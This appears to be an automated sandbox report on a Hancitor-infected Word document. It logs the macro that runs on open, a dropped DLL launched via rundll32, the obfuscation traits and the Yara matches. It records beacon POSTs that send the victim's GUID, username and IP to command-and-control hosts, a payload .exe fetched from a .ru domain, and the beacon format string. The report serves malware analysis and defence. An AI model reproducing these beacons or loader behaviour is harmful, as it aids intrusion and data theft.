Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_021128D0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?format=xml HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive

Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: unknown

Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://anspossthrly.ru/8/forum.php
Source: rundll32.exe	String found in binary or memory: http://api.ipify.org
Source: svchost.exe, 00000005.00000002.2168568117.0000000000624000.00000004.00000020.sdmp	String found in binary or memory: http://api.ipify.org/?format=xml
Source: rundll32.exe, 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp	String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://sudepallon.com/8/forum.php
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://thentabecon.ru/8/forum.php
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Malicious sample detected (through community Yara rule)

Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled eclmng. please click Engble
Source: Screenshot number: 12	Screenshot OCR: Enable editing txjtton from the yellow bar above Once you have enabled edmng. please cHck Enable
Source: Screenshot number: 12	Screenshot OCR: Enable content button from the yellow bar above a S

Document contains OLE streams with PE executables

Source: 0708_3355614568218.doc

Stream path 'ObjectPool/_1687137834/\x1Ole10Native' : MZ signature found

Document contains an embedded VBA macro which may execute processes

Source: 0708_3355614568218.doc

Document contains an embedded VBA macro with suspicious strings

Source: 0708_3355614568218.doc

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\nimb.dll

Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_004293B0: GetFileInformationByHandle,DeviceIoControl,

5_2_004293B0

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02121E10	3_2_02121E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213BB0E	3_2_0213BB0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02131B95	3_2_02131B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132848	3_2_02132848
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132068	3_2_02132068
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211F0C0	3_2_0211F0C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212F92D	3_2_0212F92D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213A1C3	3_2_0213A1C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B1F0	3_2_0212B1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213A705	3_2_0213A705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212FF50	3_2_0212FF50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213243C	3_2_0213243C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213547B	3_2_0213547B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132C68	3_2_02132C68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02139C81	3_2_02139C81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E85F	5_2_0040E85F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00415800	5_2_00415800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040F9C0	5_2_0040F9C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004122DD	5_2_004122DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004220F8	5_2_004220F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00425141	5_2_00425141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042D972	5_2_0042D972
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042F101	5_2_0042F101
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004261C4	5_2_004261C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004221DF	5_2_004221DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430268	5_2_00430268
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040727F	5_2_0040727F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FA0C	5_2_0042FA0C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040B2F3	5_2_0040B2F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FB2C	5_2_0042FB2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00432BF4	5_2_00432BF4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040A3A4	5_2_0040A3A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042F445	5_2_0042F445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00420408	5_2_00420408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430C08	5_2_00430C08
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004314CB	5_2_004314CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00409CE5	5_2_00409CE5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042E4B7	5_2_0042E4B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042057D	5_2_0042057D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00414506	5_2_00414506
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00406D10	5_2_00406D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430523	5_2_00430523
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042DDCA	5_2_0042DDCA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00409DD8	5_2_00409DD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FE02	5_2_0042FE02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430E22	5_2_00430E22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00432E3A	5_2_00432E3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042E6E2	5_2_0042E6E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042EEA0	5_2_0042EEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040A71A	5_2_0040A71A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042EFC5	5_2_0042EFC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040BFEF	5_2_0040BFEF

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 0708_3355614568218.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Document contains embedded VBA macros

Source: 0708_3355614568218.doc

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 0212FEF0 appears 51 times

Yara signature match

Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload

Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/14@7/5

Source: C:\Windows\SysWOW64\svchost.exe

5_2_00415800

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$08_3355614568218.doc

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC438.tmp

Jump to behavior

Source: 0708_3355614568218.doc

OLE indicator, Word Document stream: true

Source: 0708_3355614568218.doc	OLE document summary: title field not present or empty
Source: 0708_3355614568218.doc	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR

Source: 0708_3355614568218.doc

Virustotal: Detection: 37%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

3_2_02113580

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211CB68 push ebp; iretd	3_2_0211CB6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211E006 push ds; ret	3_2_0211E01F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213C024 push ds; retf	3_2_0213C025
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211D829 push ebp; ret	3_2_0211D844
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211E8BF push esp; iretd	3_2_0211E8C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B8E9 push ecx; ret	3_2_0212B8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211A964 push edi; ret	3_2_0211A9B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212FF35 push ecx; ret	3_2_0212FF48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211CCC8 push ecx; ret	3_2_0211CCC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211A55A push eax; ret	3_2_0211A56E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214F2CF push edx; ret	3_2_0214F2D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02150903 push ecx; retf	3_2_02150904
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214D561 push eax; ret	3_2_0214D591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214D5E0 push eax; ret	3_2_0214D591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00435E20 push dword ptr [eax+04h]; ret	5_2_00435E4F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\nimb.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
